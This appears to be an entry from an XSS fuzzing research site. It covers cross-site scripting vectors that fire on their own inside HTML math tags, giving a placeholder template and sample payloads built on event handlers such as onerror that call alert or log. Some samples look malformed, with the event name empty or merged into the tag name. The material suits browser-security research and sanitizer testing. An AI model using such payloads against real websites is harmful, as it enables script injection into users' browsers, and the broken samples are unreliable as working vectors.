XSS vectors that execute automatically inside math

This vector shows which events fire without user interaction inside a math tag

Created byhackvertor

Created Apr 17, 2024

Updated May 25, 2025

Detecting browser...

CategoryURL Handling

VisibilityPublic

TypeXSS

CharsetUTF-8

$[data1] placeholderhtml

$[data2] placeholderevents

Template used:

<math><$[data1] src=1 srcdoc=1 href=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]></math>0x0D
<math><$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]></math>

Sample payloads

<math><NO_MATCHES src=1 srcdoc=1 href=1 href=1 ="alert('NO_MATCHES->')"></NO_MATCHES></math>0x0D
<math><NO_MATCHES ="alert('NO_MATCHES->')"></NO_MATCHES></math>

<math><img->onerror src=1 srcdoc=1 href=1 href=1 ="alert('img->onerror->')"></img->onerror></math>0x0D
<math><img->onerror ="alert('img->onerror->')"></img->onerror></math>

XSS vectors that execute automatically inside math

Sample payloads

Fuzz results

Distributed Fuzzing